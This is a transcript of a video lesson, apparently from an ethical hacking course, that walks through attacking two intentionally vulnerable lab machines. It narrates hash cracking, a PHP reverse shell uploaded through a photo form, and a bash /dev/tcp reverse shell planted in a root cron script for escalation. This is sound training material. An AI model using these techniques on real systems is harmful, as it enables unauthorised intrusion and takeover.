to the next machine. This one is called Academy, and this was created by Alec specially for us. Now we're going to attack this machine, and we're going to get a low-level user. We're going to pivot into a second low-level user, and then we're going to root this machine. If you did not root this machine, do not stress about it. These boxes are meant to be hard if you are a beginner, and you are meant to walk through with us and see all these different techniques, tips, and tricks, and just the idea and mindset as well. So do not stress if you are having issues trying this on your own. That's 100% okay. So I have imported the machine. You should be familiar with this. At this point, all I'm going to show you is how to log into the machine, similar to what we did with the Windows box. Now the password here, the username is root, the password is TCM. Tango Charlie Mike. Okay, we come in, we're going to run DH client, hit enter. Okay, mine says file exists. That's because I already ran this. You go ahead and run it. It should take a second to load. Once that loads, go ahead and type IPA, and you should get an IP address back. Okay, mine says 192.168.138.129. Yours might say something incredibly different, but go ahead and go with whatever the IP address says here, because that's what you're going to use. Now, with that out of the way, I went ahead through the magic of editing and ran a Nmap scan. You're welcome to do this as well. -A-P -T4 IP address. Nothing new at this point, okay? What came back for us was a few different things here. We have port 21 open, and we have a VSFTPD, say that 3 times fast, 3.0.3. And it says anonymous FTP login is allowed. Okay. It says, hey, there's a note.txt in here. Okay, that could be interesting. Now keep in mind, everything that we're doing in these machines is going to be very gamified, very CTF or capture the flag. And that's exactly what we're doing, is we're capturing the flag. So don't stress about this being incredibly realistic at this point. We're going to get into the more practical stuff as we get into the Active Directory pen testing section. We're really just trying to focus on some of the basic concepts and some of the things that you'll see if you go do any CTF events or you go on to any other certifications or anything like that. So this is a good introduction, kind of jump into the pool, maybe get your feet wet first into hacking. So with this in mind, we've got port 21, we've got port 22, we've got port 80. Now, 80 is a web server, 22 is SSH. My strategy here, when I see port 22, I immediately erase it off the board. Now, that's not to say that it couldn't have an option of attack here. You could brute force it. You could go in there and try like a root username, or if you knew other usernames, you can go in there and just try to brute force the password, and maybe you get lucky and log in. Usually on CTFs, that is not the intended route. Now, for things like, say, example, a pen test, you might want to brute force SSH because there's a couple reasons. One is there a weak password? Can I log in with a root user on a weak password for this machine? If so, that's bad. You tell your client, hey, this is bad. You're using weak passwords. Number two, you want to see if your client can pick you up, meaning, do they detect you when you are running brute force scans? If you have 500 attempts against an SSH login and you're still able to go attempt after attempt and nothing has been detected, you have not been prevented on that network, then that's an issue. You should probably bring that up to the client and say, hey, I ran a brute force against this login and you didn't detect me, you didn't see me do anything. We'll talk about that more in the report writing section and some of the things we talk about detection wise, but that's another example of something you want to test for and see if you're detected. You're testing detection throughout an entire pen test. So you want to say, hey, did you see me scanning? Did you see me brute forcing? Did you see me running exploits? Did your antivirus pick me up? Where was I caught during this pen test and where can you improve? So something about SSH, a little tangent there. But with that out of the way, port 21's open, port 80's open. Now we see down here that it says, hey, we're getting an it works page, which means that it's just a default Apache 2 web server. We can go out to this web server and just take a look, 192.168.138.129. You can see this is just a basic, hey, it works Apache 2 Debian page. That tells me that we're likely running on PHP on the back end, though that doesn't mean that entirely. This is just kind of an indicator. When we see Apache, I'm assuming PHP on the back end. So let's go back here. Now, we could do a couple things. We need to identify what's going on behind the scenes, because all we're seeing is a default web page, which, by the way, this is a finding on a pen test. So you would say, hey, this is just revealing too much information. Why do you even have this out there? Is this web server meant to be up? If it is, then take away this default web page and make it, make it say, hey, if you're not supposed to be here, then don't be here. Anything but a default web page, because all we're seeing is architecture here. If it's not supposed to be there, from a hacker's perspective, this means poor hygiene. You're just leaving ports open. You're just throwing computers on the network and on the internet willy-nilly, and this just means that you likely have poor hygiene, and we want to look into you further, because if this is something you're doing, you might be using bad passwords or not patching, etc., etc. So anyway, off that tangent, going back to the scan, I'm curious to know what the note says. We'll go check that out. We have anonymous login, so we'll start there, and then we're going to go ahead and take a look at the different pages that could be hiding behind the default page. So I'm going to leave this up, and now we're going to go take a look first at the FTP. So in here, I'm going to make this bigger. Okay, so FTP, all you got to do is 192.168.138.129, or whatever your IP address is. And then I like to just type anonymous twice. Okay, we get an anonymous login. We are successful. We can come in here and say ls. All right, and we have a note.txt in here. So all we need to do is type in get note.txt. That's it, and we're pretty much done. So the option here is we have FTP open. Now, there's a possibility that we could utilize this. So we have the ability with FTP to put files and get files. We just got a file. We can come put something on here. The only issue is we don't know where on this machine that this note.txt is stored. If for some reason this note file was stored in like the, I don't know, this Apache server, if we came in here and we just went like /note.txt and we saw it, all right, then that could be of interest, because we know the directory that we're in. We could come in here, just upload malware, come up here, execute the malware because we have execution, and then we could get a shell and keep pushing forward. But in this instance, we don't know where it is. There's a good chance it's not even in the web server. If for some reason it was in the web server, we could use that to execute, and that is a strategy that we might see at some point. But here, in this instance, unless I know where this is, the ability to put files in here does nothing for me. In a real world scenario, maybe we can go look at getting social engineering or getting somebody to open a file or something along those lines. But for here, for this capture the flag type style, we are only focused on getting this note, and that's pretty much it. Also, secondary finding on a pen test would be this, because we see Apache 2.4.38. It's telling us it's running a Debian server, which means we're attacking Linux. So if we were doing this blind, didn't know that, now we know. We know the Apache version, we know Debian. We're getting a little bit of information, and we're just compiling that information right now. Debian server, Apache, PHP most likely. Okay, all of this is information gathering. That's all we want to do, is gather as much information as possible. Now let's go ahead and exit out. And I want to just cat out this note.txt. Okay, so it says, hello Heath, Grimmy has set up the test website for the new academy. I told him not to use the same password everywhere. He will change it ASAP. I couldn't create a user via the admin panel, so instead I inserted directly into the database with the following command. All right, so we get looks like a database information here with values. Now it says the student regno number is what you use for login. So student regno here, you see this ties up to the first. And then we see student photo, and there's nothing in for the student photo. We see password, then we get password here, student name, okay, pin code going on. So this is pretty sensitive information. If this were on a pen test, which I've actually seen something similar to this, I've been on pen tests where I have seen open FTP servers. I've seen open web directories where they had backups of their entire website on there with database passwords and everything. it is it's realistic in a sense that you could run into something like this. It would be pretty bad. So anyway, this is coming from our friend J Delta, and we're gonna go ahead and just grab this password here. We've got this. Now the issue is this is likely not a password. This is likely a hash, and we can copy this and see first before we go down that route. This might be a password, but we can copy, and let's just take a quick look. We can go, let me cd back out of this here. We can do something like this. We can type in hash identifier like this and just hit enter. Okay, this is built into Kali Linux. You just go ahead and paste selection, hit enter, and this will tell you all the things that it thinks it is. This is saying, hey, most likely it's an MD5 hash. Okay, so we have an MD5 hash. Guess what? We can crack that hash. I'm gonna go ahead and exit out of here with Control C. And if we go to Google and do a quick Google search, so I'll give you time to go do a Google search, but all you have to do is say hashcat, which is the tool we're gonna use to crack this password, crack MD5 hash. Here we get a blog that says how to crack MD5 hashes. You go into that, and it says, hey, in order to do that, you need to run hashcat -m for module and 0 with your hashes file, and then a password list like rocku.txt. So we haven't gotten much into hash cracking in this course, and we're going to talk about it a little bit. We'll talk about it a lot more when we get into the actual Active Directory hacking, because we start cracking passwords there, it becomes a lot more important. Here, we're just going to play around with it a little bit. So I'm going to show you this only this one time. I'm going to show you this on a Linux machine. This is running in a virtual machine here. Okay, so we're running hashcat. We're about to run hashcat in a virtual machine. Typically, we do not want to do this because hashcat is going to be running off of our CPU. Okay, it's going to be running off our CPU inside a virtual machine. That's going to make it run a lot slower. Hash cracking runs off of GPUs. Okay, so we're running off of our graphics card, not our CPU. So we want to do that. So when I run hash cracking in the real world, or even later in this course, you're going to see me running it on Windows because that is my base operating system. I will take that, I'll run it off there because it's going to use my GPU. It's going to use my graphics card, and that's what I want. So in this instance, it's going to go a lot slower, but because it's going to be an easy password to crack, we don't have to worry about it too much. But if you want to be good at cracking passwords and practice that, definitely make sure you're using it on your base OS, regardless of what it is, because it's going to crack a lot faster than running it in your virtual machine. So we're going to do a hashcat. Actually, before we do that, go ahead and type in locate rocku.txt. You should have it somewhere. Okay. You might have a tarred version of it or a gzip version of it. You can open that if you navigate to this folder, like user share, come in here to your folder, like literally go into browse network or file system and go into user share, etc. You can get there if for some reason you do not have rocku.txt. In the later version of Kali, they already have it here. So I'm assuming that it's here. If not, if all you see is a gzip, go ahead and just unzip that. Now, what we're going to do is we're going to say, actually, one more thing I forgot. You can go ahead and do a mousepad or gedit or whatever you want. You could do a hashes.txt. Copy and paste the hash. It's a little small probably for your screen from what you could see here. Copy and paste the hash into this hashes.txt, the one we got right here. Okay, make sure it's in a file. So once we've done that, go ahead and run hashcat with a -m of 0. That's a module. So we're going to be attacking the module of 0, which correlates to MD5 hashing. We're going to give it the file of hashes.txt, and we're going to give it a word list to run through of rocku.txt. Okay, and I'm going to scroll up just so you can see this. It's going to run. It might take a minute to run. It took me a couple seconds here. Gets through it pretty quick. Rocku runs fairly fast on a VM, and this one picked it up pretty quick. So the password of what's coming up is student. Password of student. Not very great password. Weak password policy. Okay, so we have a username. We have a user ID. We have a password of student, but we have no idea how we're going to do this. Okay, where are we going? Now, I can take some educated guesses here. Like, for example, they're saying, hey, this is for the new Academy, and this box is called Academy, and there's a good likelihood that if you were to do a /Academy on the webpage, that maybe you find it, right? And we can go Academy and go find it, but I don't want to just show you and cheat. So let's go back and we're going to walk through it. We talked about directory busting with dirbuster. I want to show you a couple other tools that we can use and show you the pros and cons of both of them. So open up a new tab, make sure we're going to use two different tools. So I want to show you both. Go ahead and use a tool called dirb, D-I-R-B. And for dirb, all we have to do, I do believe, is just type in 192.168.138.129 and hit enter. So this is going to go off of the website. It's going to run on its own word list. It's going to go in here and try to find stuff. Immediately it found phpMyAdmin. The issue is with this, it's just going to go in and start like going into the phpMyAdmin and looking for directories, and it's finding all kinds of directories, and this is going to take a minute. So this is one way of doing it. Another way of doing it is using a tool called FFUF. I don't know how you say it. FFUF, whatever, everybody's got their own pronunciation. If you do an apt install of FFUF like this, you hit enter. I already have it, but yours should pick it up. Okay, we're going to run the tool just like this. So we're going to say FFUF once yours is installed. Do a -W, that is for word list. And your word list should be in user, share, word lists. And we can do dirbuster, that's fine. This is where all the word lists are. And then I just like to double tab or tab around, and we're going to use the medium word list. That's my go-to for most cases. We could use the lowercase if we wanted to. I think either are fine. Okay. From here, we're going to go ahead and back up. And now what I'm going to do is I'm going to put a colon here, and I'm going to type in fuzz. Okay, this is what we're going to fuzz. We're going to do a -U, and we're going to do HTTP 192.168.138.129, and we're going to say /fuzz. So what we're telling this is, hey, with this word list, we're going to be fuzzing with this word list. We're going to fuzz this parameter right here. This is exactly what we're doing. Okay, we're going to hit enter. And this is immediately going in and just doing all that we want to do. It found Academy right away, phpMyAdmin right away, and this is very fast. Found a server status, and all it's doing is looking one thread deep. So it's not doing what dirb is doing. Dirb is going and saying, hey, I found phpMyAdmin. Now I'm going to go through and find every single directory inside of that and every single directory inside of those directories, which can take a while. This one is saying, I'll find all the first level directories, and if you want to go search those, you can. Like, we could type in Academy/fuzz. There's commands in here that we can do to take this further. We can limit which response statuses we want. Maybe we only want 200s, or maybe we want 302s, depending on this. So maybe we don't want any 401s or 403s or 405s. We only want the ones that come back as 200 guaranteed. So in this case, we're looking like we got a 301 from Academy, so there's a redirect there. Same with the phpMyAdmin. All right, so with that in mind, this is how you can find it. Found it quick. This one's still going. There's different strategies, different tools, everything else. This one's pretty nice. There's a lot of tools that come out for directory busting all the time. Latest ones are being built in Rust, which is interesting because Rust is really fast. There's ones built in Go because Go is really fast. So you pick your poison on a directory busting tool and you just run with it. So anyway, we're going to go ahead and enter in that registration number. So you can go ahead and just come copy it from here. And then you're going to go ahead and paste that. And then the password is student. For me, I've changed the password in here because I've already gone through this box. But you'll be brought to a change password screen. So you could type in student, change it if you want to. You really don't have to. You can come in here and start clicking through, hey, I want to enroll in a course, enroll history, my profile, change password, etc. So this is really what we have. Now, the interesting thing in here is that we have this upload photo feature. So if we look at this, we can come in here and say, okay, how do we want to attack a website? What are some ways that we can get code execution? We might be able to perform like LFI, RFI attacks on this and pull down information or execute code. Maybe there's SQL injection somewhere in here we can pull down and dump the database. We did see a PHP my admin. Maybe there's more behind this, behind the scenes that we can do. We can also go out, and something that we didn't really look at on the first scan is we can do a version check. Like, we didn't check on this version to see if there's a vulnerability there. That would be something you can do. Same with the OpenSSH, same with the Apache. You can go and do those. I'm only not showing you that because I'm saving time here, but the correct methodology would definitely be to go check these as well to see if there's any vulnerabilities. Now, there is in here this is a online registration. You can look and see if there's any way to pull down, like viewing the source, and see if maybe anything in here would tell you, hey, what CMS is this? What is this built off of? Because clearly this is a CMS of some sort that they've used. Now, with that in mind, we can go back and we can kind of just look and see if we can find anything. The first thing we might want to do is just come in here and do a browse and come and say, okay, I'm going to upload, let me go to my desktop. I'm going to upload a picture of a dog. You don't have to do this. I just wanted to see if it works. Okay, so I uploaded a picture of a dog. Perfect. Now, the question here is, and by the way, we can see up here that PHP is in use. I'm going to make this a little bit bigger, by the way, but PHP is in use. So it should say my-profile.php. What we want to do is we want to see if we can upload a file that is not a dog. Okay, like not a JPEG, not a GIF, not whatever, PNG. We want to see if we can upload something that's not a photo and abuse the file upload system. If they're doing no checks here and we can just upload this, they are in big trouble. So what we can do is we can right click and go, we can view image, which will tell us kind of where the image is stored. So it's stored in Academy student photo / and this is dog.jpg, which is what I uploaded. So what we can do, let me refresh this. What we can do is try to upload a reverse shell here and see if we can't get a connection back by viewing this. Let's see if we can upload something malicious. Now we know this is Apache, so we're going to upload via PHP. So I'm going to go ahead and do that. What I want to do is go out and we're going to do a quick search. We're going to go to Google and we're going to say PHP reverse shell. And there is a great one out there from Pentest Monkey. Okay, first hit should be up here. There's other ones that you can use. People have their preferences and their favorites. This one is 6 years old and still works perfectly. So all we're going to do is go raw here and copy this. Control A, Control C, very quick. And what I did was I went ahead and put this into a file here. So let's go ahead and clear screen. You can just do a mousepad, gedit, nano, whatever you want. Actually, I might nano this just so you can see. But I called this shell.php. And then I pasted it in here. That's all you got to do. Shell.php, paste it in here. I'm going to scroll down a little bit. You're going to get to this little part after the comments. And you're going to see, hey, it says change this, change this. You need to put in your IP address. Whatever your IP address of your attacker machine is, that needs to go here. So if you need to open up a new tab, come in here, do IPA or ifconfig, 192.168.138.131. Come back. That matches what I've got. 1234, in my opinion, is fine. You can leave it as is for this machine. So, Control X. This is fine. You can hit yes, save if it asks you to. Just hit Y and enter, and that will save your shell.php. So, we have shell.php. We need a listener. We're going to do a reverse shell here. So 1234 on the NVLP on Netcat. This should not be unfamiliar to you. You should already be aware of this. So we're going to go here, and now we've got this listening. We're waiting for something to happen. So we're going to go back into this, and we're going to upload this malicious file. So I put this in my root folder, shell.php. Click update, come in here. You can see nothing's happened. Let's see if it tries to execute. Oh, it already executed. So we don't even have to go to, like, we don't have to right click and go to that that location. It already executed that file when it loaded this page, which is crazy. So we have a shell here, which is great. So if we do a who am I, you can see we are the www-data user. So we are not We are not an admin on this machine. We are not root. We can do a sudo-l, but they rudely took away sudo. We could type in which sudo and see if it's there. Locate sudo. Maybe they put it somewhere else. Locate not found either. So they're playing a little bit of games with us, just a little bit, because we should be able to run and see, hey, what privileges do we have as sudo? But it's not there. That's okay though. We're still going to be fine. So what I want to do next is we land on a machine. We're not a root user. We need to perform privilege escalation. This is where things get fun, and this is where we're going to take a bunch of winding roads to get to where we're getting. So what we're going to do now is we're going to use a tool called linpeas, and we're going to utilize that to do some searching. Linpeas is a automated tool that goes out and does basically hunting for any sort of privilege escalation. And I kind of cheated a little bit. Let me go to Google and just type in literally LIN like Linux, PEAS like the food, peas. Hit enter. You'll see it here in GitHub. And you see a linpeas.sh updated 3 days ago. Nice. All right. And this is going to go through and perform all kinds of checks to see if there are any escalation privileges or privilege escalation or paths for us with privilege escalation, what I should say. So you can go in here, again, raw, Control-A, Control-C. And what I like to do, and this is how I actually operate, is I like to make dir on a transfers folder. I call it transfers. And I've already got one, so I'm just going to cd into transfers. Or transfer is fine as well. ls in here, and linpeas.sh is already in here. So you can nano linpeas.sh, same thing. Just go ahead and get it into this folder and have a nice little transfer folder. Make sure you copy, paste it, put it into a file, and have it ready to roll. So what we're going to do is we're going to host up a web server. So we're going to say Python 3-m for module, and we're going to type in http-server 80. Okay, and this is going to host up a web server in this folder. We're going to go and grab this file on this machine. So a good place to put a file that we want to dump on this machine is we're just going to put it right into the temp folder. So cd into temp, print working directory. We're in /tmp. Okay, so what we're going to do now is we're going to do a wget http your attacker machine IP. So I'm at 131 /linpeas.sh. Hit enter. It should copy over. You could see it coming through. Do a quick ls. I already had linpeas on here because I was running through this box earlier, but I'm going to use the original linpeas. So pretend with me. We need to make it executable. chmod +x, or change mode, linpeas.sh. Okay. Now we're going to run it. /linpeas.sh. Just like that. Hit enter. It's going to start just flying across the screen. It might take a minute to go through. We're going to go through some of this, but I'm going to give you the general gist of what you're looking for and the things that you want to look for in here. So I'm going to take this and scroll back up to the top. If yours isn't done running yet, that's fine. I kind of just want you to watch anyway on this one. So we run it. We get a nice little Ninja Turtle. Cute. And you go through and it tells you the legend on here, okay? And it says, hey, red, yellow means 95%, could be a privilege escalation vector. Red, you should look into it. And then it gives you different ones. So really, we're looking for red. And we're just trying to see if we can find anything in here that could be of interest for us. Now, as we're scrolling through, it gives us information about the, the Linux distribution, the release, all that. That could be useful if we have some sort of escalation against this. There are different types of escalation that we could use, and the release information could be important to us, though it is not for this machine, so we're going to skip over it for now. You go through, it tells you all kinds of stuff about the all the operating system, what's running on it, and it's looking for anything that could be of interest. Now it's telling you, hey, what do we have that we can run? This just says, yes, this is a virtual machine. Keep going through, keep going through. This is looking at cron jobs, which we'll talk about in a little bit. This is looking for any sort of systemd timers or cron jobs. We have no cron jobs running that look relevant to us. This is just running Apache 2. This is running a, and this actually looks like it could just be the processes running, not even the cron jobs. So these are just the processes running. Nothing of interest to us right now. Scrolling through here, we're just going to look and see if we find anything of interest. Now there is a highlighted red and yellow here with home Grimmy backup.sh. We're going to copy that bad boy, see what it is. And then from here, you're going to go ahead and just keep scrolling. So we come through, keep scrolling, keep scrolling. And a lot of this is just information that is provided with us. What is of interest, and for this machine now, you're welcome to read through this. There's a lot of data to read through. I like to scroll through kind of really quick and just see if anything stands out. Not at this pace, but like right here, look, we're scrolling through and we see, hey, there is a MySQL password of my very secure pass. That is of interest to us. It looks for passwords, and we're going to scroll down to the bottom. I'll show you kind of what it looks like. So if we scroll all the way down, we start scrolling up a little bit, you'll see that the my very secure pass shows up again. It shows up right here, and it tells you, hey, this is in this includes config.php file. So that's really what we're looking for. We've got a password up here, manage students at 12345, so we can go look at that if we wanted to. And some things in here that we want to make note of. So maybe we open up a notepad. Like we come into a text editor, we just do a paste here because the Grimmy's of interest. We found the password of my very secure pass, which maybe we want to just copy this whole thing out. Okay, and I might put that into my little notes as well. And maybe I want to read this document and see what's in here as well. So this is of interest. We want to go through and just see anything of interest. Now, I am skipping ahead just a little bit only because to save time for the video, there will be other opportunities to learn privilege escalation. And again, we have the privilege escalation course if you want to go through this in more detail. This is, again, just trying to get your feet wet, introduced to the idea, and understanding what we're doing here. So now let's go ahead and let's look at the file that we just found first. We'll wait on the Grimmy file. Let's go ahead and just cat this out. Okay, so if we cat out this config.php, we see that we get a SQL user of Grimmy. We get my very secure pass. Okay, we get some information there. So we can maybe try to see if this works for us anywhere. It's a SQL user database. Maybe we can get into the SQL database and find some information. That is one option, though I did not see any sort of information for SQL unless we could log into phpMyAdmin with this on that web panel that we were looking for. So that's something that could work. We also want to see if there's anything. Maybe we go cat Etsy password, see if that works for us. Okay, so Etsy password is showing us all the users on the machine. Of interest, we like to scroll down to the bottom and we see a user of Grimmy. And it says Grimmy's an administrator, which is interesting. So it's pointing to Grimmy being a user on this machine. So it doesn't hurt to just copy this password and see what we can do with Grimmy. So what we can do here is I'm going to go ahead and just go to a new tab. And I'm going to cat. And by the way, we should have known that anyway, because there was a folder called home Grimmy backup.sh or home Grimmy. So Grimmy would have been an indicator anyway that that we were up against a user named Grimmy. So we do SSH, we can do Grimmy at, and this machine is 192.168.138.129 for me. Go ahead and hit enter once you got it in there. And it should ask you your first time about a fingerprint, just type in yes, hit enter, and then go ahead and paste in that password that we just got. And maybe I copied it wrong, so I'm gonna go copy that one more time. Okay, and here we go. So now we are in this machine. we don't have sudo access, I don't believe. Sudo-L. Again, it says sudo not found. It could be that we have a broken version of bash or they intentionally removed it because it's just CTF. That's one of the first checks I do. History is another check, though I have some history in here from myself. So you might not have any history when you come in here. This is just all me doing this. Now, one thing that I do again is I like to come in and I like to download linps, run it again, see if anything's changed. I'm going to skip over that process, but I'm just telling you for the process. What we want to do is we want to make sure we look at the file that's of interest. Okay, so that file, when we went and saw, was in the home Grimmy folder. So let's just go ahead and cd to home Grimmy. And we're going to ls in here. And all we have is backup.sh. So let's run cat backup.sh. So what we have is, it looks like it's removing a temp backup file, .zip. It's zipping up a backup.zip from this var HTML Academy include. So it looks like it's doing a backup of the Academy, and then it's changing the permissions of the temp file. So if we look at temp, there may or may not be a backup.zip sitting in there. So what this is telling me is this is probably going out there and doing periodic checks, or a script is running periodically to see if, or to perform this backup. So it could be running every hour, every day, every week. We don't know what it's running. Now we can see if by chance we have access to that information. When we were looking at the cron information from linps, I didn't see it in there. We could also do a cron tab -L to see. Here we have no cron tab for Grimmy. So what's happening possibly is that Grimmy doesn't have the cron tab. We can try to see if we can cron tab of a user, look at root and just do a dash list, but it says you must be privileged. So we have to run sudo, but we don't have sudo. So we won't be able to switch into root to use that as well. We don't have privileges to do that. So without having any cron tab information or seeing it running when we looked at the cron, we could do a cron tab -E as well. I just don't, I mean, there's nothing in here. So this isn't giving us any indicator. And a cron job is something that will run for us, by the way. And we tell it, hey, I want to run this script every hour, every minute, every day, every week. We could tell it when we want it to run. So this is a realistic scenario in that sense that cron jobs are used in administration. So from here, if we don't have that, there's something else called a system D timer. We can look at that from systemctl and just say list timers and come through like this and see if there's any script in here running that's in a timer. And I actually don't see anything here. You can hit Q for quit and that'll exit this. So when we have this situation, there's a tool that we can use out there that will actually give us more information of what's running with the processes than what is leading on. Remember, we ran a PS with the we ran PS for everybody with the script, the linps. We saw it. We didn't see anything in there that was any indication of this backup.sh. So if we want validation and confirmation that this is running on a timer, we can go ahead and go out, and there's a tool out there that is pretty neat. It's called PSPy, PSPY. And all you have to do, literally all you have to do, Google this, by the way, I'm gonna do it just so we could say we did it. PSPy, literally the first thing that comes up. So in here, what you wanna do is go ahead and download the 64-bit static version. And when you download that, you might get put into your downloads folder. All you have to do is, we'll open a new tab here real quick. All you have to do is do a move command, if you don't remember. So move, downloads, PSPy, and then just put that in your transfer /PSPy, okay? PSPy 64 is actually what it's called. I'm just winging it here. I've already got it in my folder, but make sure you move it over to your folder. Or if you want to keep it in downloads and run from there, that's fine as well. Just note that I already have this in my folder here. So all you have to do now is cd over to your temp folder. If ILS, I've got some stuff in here. Looks like linps backup.zip is sitting in here. what I'm going to put in here is this PSPy, and we're going to run it. So I'm going to do a wget. And remember, I already have my listener for my web server running from earlier. So this is just going to be a simple grab and go. And this is PSPy 64. Grab this. All right, ls chmod plus x on PSPy 64. And we're going to run it. Now, what this is doing is showing us all the processes running on the machine, all of them. And we can scroll through this and kind of see, and yours is going to look different than mine. Don't worry about the PID numbers. Don't worry about the timing. Don't worry about anything like that. All you got to do is scroll through here and see if we can see that backup.sh running. And we can come through, see if there's anything in here. And look, now it showed up, backup.sh. I don't think that was there before. So what happens is it just waits for this to run, and then when it runs, we're seeing it come through here. So that looked like it just ran. If we wanted true confirmation, we could sit here and wait another minute and see if this runs, because my hunch is it's running every minute because this is capture the flag box. So we could do that. I'm going to tell you that it is running every minute, so we don't have to do that, just to save a little bit of time. So Control-C, get back into your Grimmy at Academy, and now we are going to abuse this in our favor. Let's go ahead and go to CD, home, Grimmy. We're gonna go back, make sure you have your backup.sh in there. And now what we're gonna do is I want you to go to Google, and you go and say bash reverse shell one-liner, okay? And there is a reverse shell cheat sheet from Pentest Monkey. You could also type that in. Click on that. Here you will see right up front, you will see bash-i. You're gonna see this right here. This is a one-line reverse shell. This is awesome. All we're gonna do is put this into a shell script, which we already have. We have it right here. We're gonna put that in there, and when it executes, it's going to perform reverse shell. So what we wanna do is we wanna modify this a little bit. So let's go ahead and open up a notepad real quick. It might be a little bit small on your screen for you, but what I'm doing is I'm putting in where it says 10.0.0.1. I'm putting 192.168.138.131, which is my attacker machine, and I'm going to change the IP address to 8081, or to the port to 8081. You are more than welcome to keep it at 8080. I'm just doing this because I ran through this once earlier, and there's a possibility that port is still out there lingering. So just for the video purpose, I'm changing it to 8081. So what does that mean I have to do? Netcat, NVLP, set up that reverse shell listener. And here's what's going to happen. We're going to come in here and we're going to say nano backup.sh. You can come in here, tab down a couple times, and if you hit Control-K, it deletes a line. That's some magic if you didn't know it. And you can come right click, paste selection, maybe paste clipboard. Okay. And what we're going to do is this is going to execute bash-i dev tcp 192.168. It's going to call out to our IP address with this. And if our hunch is correct that this is running as the root user, we're going to get a root shell on this. So what's happening is this cron job is out there. It's running as root. It's executing as root. And when it executes that script, it's going to execute as a root shell, which it just did. You could see root at Academy. Who am I? Okay, so let's cd to root just for the fun of the game. Maybe cd root ls. Okay, and then cat flag.txt. Says, congrats, you rooted this box. Looks like this CMS isn't so secure. I hope you enjoyed it. If you had any issues, please let us know in the course Discord. Happy hacking. Great. That was an example of a box with a couple of pivots, a couple of different privilege escalations, and very gamified, very capture the flag. You will likely never do most of this on a pen test ever in your life, but it's still important to learn from the hacking process as we build up into this and then as we get into more of the Active Directory stuff. So that is it for this video. We're going to go ahead and call it here, and I'm going to go ahead and catch you in the next one. Okay, on to the box dev. Now let me preface this with, it is raining pretty bad here, so if you hear thunderstorms or anything in the back, consider it part of the ambiance. But we're going to do another box from Alec. Thank you, Alec, for creating this wonderful machine. And this box is a Linux machine. So you should already have it set up. We're past the setup stage. You should know how to set it up. Come in here. I already have an mmap scan ran against it. So if you do not have an mmap scan ran against it, you should go ahead and do that. Pause if you need to. Otherwise, you could just follow along. So running the mmap scan, we can see that we have port 22 SSH. And remember what we said about SSH? Well, we're not going to look at it right now. It's nothing that's, at least in my experience, I've ever found an exploit for. So unless we have credentials or something for that, we're not going to get into SSH. We have something on port 80 called Bolt installation error for Apache web server. Okay, that's an indicator this might be a Linux machine already because we're seeing Debian. That's a nice indication. We have RPC bind, which we can enumerate RPC, though it's not that advantageous for us right this instant. That gets into more advanced stuff. Honestly, as a beginner, we're going to leave RPC alone, though there is some information gathering that you can get out of RPC. As of right now, we're going to just kind of push it to the side because we've got more important things to focus on and more common things to focus on. So we have 2049 NFS, which is a network file share. Think of it like almost like SMB, like Samba for file sharing. This is a network file share. We can potentially mount to a file share here, so that might be of interest for us. We also have HTTP here for 8080. It just says connection Apache Debian PHP info page. We've got some Mount D and nlock manager. We're not going to worry about any of these ports. Which stand out to me are 8080, 2049, and 80. Okay, so keep those in mind. As you go through these more, as you get better at this, it'll be easier for you to understand which ports you're looking for, which ports you can kind of just throw to the side for now. So with that, we're going to go ahead and take a look at 80. We're going to take a look at 8080. Then we'll take a look at the network file share. So going out to the web page, I have Google open. I'm just going to go 192.168.138.137. Go here, and I'm also going to copy this and take this out to port 8080. And you can see that we have a couple of pages. One is a Bolt installation error page, which is interesting. We can come out and look at this. It looks like there's something called Bolt. We can actually go to the real web page here and see what's running. Bolt CMS. So we'll keep that in mind. Maybe they're running Bolt CMS. We could put that in our back pocket in our notes. It looks like there's an installation error. It's talking about the folder that should be installed in, which these are Linux folders. So this is more indication that we're likely attacking a Linux machine here. So we can do some research on this, but let's put that in our back pocket for now. Other website here is on port 8080. We're getting a PHP info page, which is nice. Sometimes this can disclose some information. You can actually read through this and see like here's the path, here's like the webmaster, here's the IP address that we're pointing at. So there's some different things in here that we can look at, and possibly if we were attacking this page, there could be some information disclosure in here that could tell us what the setup is of this PHP page, and that could tell us like, hey, maybe there's file inclusion, maybe there's uploading allowed, different attacks that might be enabled because of a setting that is configured or misconfigured in this PHP myinfo type page, or PHP info page. So we have two pages here that are, I mean, there's nothing really there. It's just like, hey, PHP info, Bolt, installation error. So we kind of want to look under the hood. This is just common tactic here that we're going to open up a new tab. I'm going to open up two of them. And we're really just going to enumerate this a little bit further. I just want to see how far we can take this. If it is what it is, like port 80 is literally just a Bolt installation error page, that's fine. But we need to confirm that. So we're going to use FFuff, whatever you want to call it. And we're going to do a quick scan on this. And we're going to do a user share word list. And then I go to Durbuster. And just like before, you can just tab. And I use the medium word list. I put a colon. I don't know how to, if you know the trick of getting it to line up immediately after, let me know. Otherwise, just go delete that one space. We can fuzz here. And then we could do a URL of HTTP 192.168.138.137 for this machine. /fuzz. Now, before you hit enter, go ahead and copy this. It'll make life easier. Hit enter, let that bad boy run, come in here, paste again. And all we're gonna do on this one is we're gonna put 8080 at the end of it. So we're gonna fuzz against 8080 and port 80. And we're gonna let these run a little bit, okay? So we'll let these run, perhaps finish, see if we can get anything of interest out here. While they're running, we can multitask. This is part of the process, by the way. As an ethical hacker or hacker in general, multitasking is important because if you're on an engagement like a pen test, you're going to be doing a lot of things at once. Because imagine a situation where you have 1,000 IP addresses and you have a week to go against them. If you only have a week to do 1,000 IP addresses, you're talking like a few minutes per IP address to look at. So you really have to identify and scan for low-hanging fruit, figure out which IP addresses are the most advantageous, go touch on those more, and perhaps be spending a couple minutes on each at the same time while you're doing this. So it's advantageous to look at multiple things, have scans running, and be bouncing back and forth from an ethical hacking perspective, and you pick up the ability to multitask over time. So anyway, we have this NFS, this network file share, and I'm curious if there's anything there. So what we can do, I'm going to go ahead and just open up a new tab, make this a little bit bigger. What we can do is we can say show mount. This is a command already built into your machine. If you're familiar with Linux, you probably know this. Put an E there. We're just going to list out the directory that's here, the mounted file share. Hopefully that there's one. Okay, and we're exporting from here this. Okay, this is the file share that's offered up. So we've got, looks like server NFS, network file share. So what we're going to do with this is we're going to go ahead and utilize this to our advantage. We're going to mount and see what we can see in this share. So in order to do that, we need to make a directory to mount to. So I'm just going to make a directory called mount MNT. We have an MNT folder by default. And then I'm just going to call this dev since that's the name of the machine. All right, and then we're going to mount this. So we're going to say mount tac-t NFS. So this is the type, it's NFS. And we're going to say 192.168.138.137. And then we're going to do server NFS. Okay, so we're calling out on this machine is this server NFS or SRV NFS. And then we're going to put it in mount dev, just like that. All right, so now we can go cd into 